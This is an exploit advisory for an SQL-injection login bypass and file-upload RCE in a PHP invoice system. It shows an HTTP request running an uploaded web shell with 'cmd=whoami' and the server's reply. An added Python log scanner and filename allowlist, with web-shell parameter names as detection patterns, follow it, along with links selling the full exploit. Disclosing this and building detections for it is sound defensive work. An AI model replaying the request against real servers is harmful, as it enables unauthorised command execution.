## https://sploitus.com/exploit?id=PACKETSTORM:190314
# Title: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
# Author: nu11secur1ty
# Date: 04/07/2025
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
# Reference: https://portswigger.net/web-security/sql-injection
# Reference: https://portswigger.net/daily-swig/rce
    
### Description:
The `username` parameter appears to be vulnerable to an SQL injection that bypasses authentication.
An attacker can log in to the system through this vulnerability and then upload a malicious PHP file.
After the upload, the attacker can execute that PHP file to obtain sensitive information and, depending on the scenario, even manage the system from the inside.
    
STATUS: HIGH-CRITICAL Vulnerability
    
    
[+]Exploit:

```http
GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
```
[+]Response:

```http
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 07:48:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

desktop-ahflgug\nu11secur1ty
```
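The request above is a PHP file being served, and executed, straight out of the application's `uploads/` directory. As an added defensive example (not part of this advisory and not code from the vendor's project), the Python below does two things a defender would want: it scans web-server access log lines for script files executed from the upload directory, and it shows the kind of server-side filename allowlist that would have rejected the uploaded file in the first place. The log format (Apache "combined"), the sample log lines (constructed, modelled on the request and response shown above), the list of web-shell query keys and the allowed-extension list are all assumptions.

```python
"""Detect and prevent 'upload a script, then execute it' against a PHP app.

Added example, not the advisory's or the project's code. Assumes Apache
combined log format; adjust LOG_RE for other servers.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format (assumption about the deployment).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# The application's upload directory (path seen in the advisory's request) and
# the extensions the PHP interpreter may be handed; nothing under UPLOAD_DIR
# should ever be executable.
UPLOAD_DIR = "/uploads/"
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php3", ".php5", ".phps")
# Query keys commonly used by simple web shells (assumption; extend as needed).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}

# Constructed sample access log: one hit matching the advisory's request,
# one legitimate download from the same directory, one unrelated login POST.
SAMPLE_LOG = [
    '192.168.100.77 - - [07/Apr/2025:07:48:39 +0000] "GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1" 200 29',
    '192.168.100.77 - - [07/Apr/2025:07:40:01 +0000] "GET /pwnedhost/simple_invoice/uploads/invoice_12.pdf HTTP/1.1" 200 81234',
    '192.168.100.77 - - [07/Apr/2025:07:41:10 +0000] "POST /pwnedhost/simple_invoice/login.php HTTP/1.1" 302 -',
]


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def classify(entry):
    """Return the reasons an entry looks like script execution from the upload
    directory; an empty list means nothing suspicious."""
    reasons = []
    path = entry["path"].lower()
    if UPLOAD_DIR in path and path.endswith(SCRIPT_EXTS):
        reasons.append("script extension served from upload dir")
        if SHELL_PARAMS & {k.lower() for k in entry["query"]}:
            reasons.append("command-style query parameter")
        if entry["status"] == "200":
            reasons.append("server executed it (200)")
    return reasons


def scan(lines):
    """Return (request target, reasons) for every suspicious line in a log."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["target"], reasons))
    return hits


def is_allowed_upload_name(filename, allowed=(".pdf", ".png", ".jpg", ".jpeg")):
    """Server-side allowlist for an upload filename: no path separators, exactly
    one allowed final extension, and no script extension hidden in the middle
    (shell.php.jpg), which some Apache AddHandler setups still execute."""
    name = filename.lower()
    if not name or any(ch in name for ch in "/\\\x00"):
        return False
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    if "." + parts[-1] not in allowed:
        return False
    return not any("." + p in SCRIPT_EXTS for p in parts[1:-1])


if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_LOG):
        print(target, "->", "; ".join(reasons))
    for candidate in ("1744008900_RCE.php", "shell.php.jpg", "invoice_12.pdf"):
        print(candidate, "allowed" if is_allowed_upload_name(candidate) else "rejected")
```

The log check is a detection for an upload directory that was left executable; the durable fix is to deny script execution there at the web-server level (or store uploads outside the document root) and to validate the filename and content on the server, since the client-side form can be bypassed once the attacker holds a session.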
    
# Reproduce:
[href](https://www.patreon.com/posts/invoice-1-c-2025-126106368)

# Buy the full exploit:
[href](https://satoshidisk.com/pay/CO7bRi)

# Time spent:
01:15:00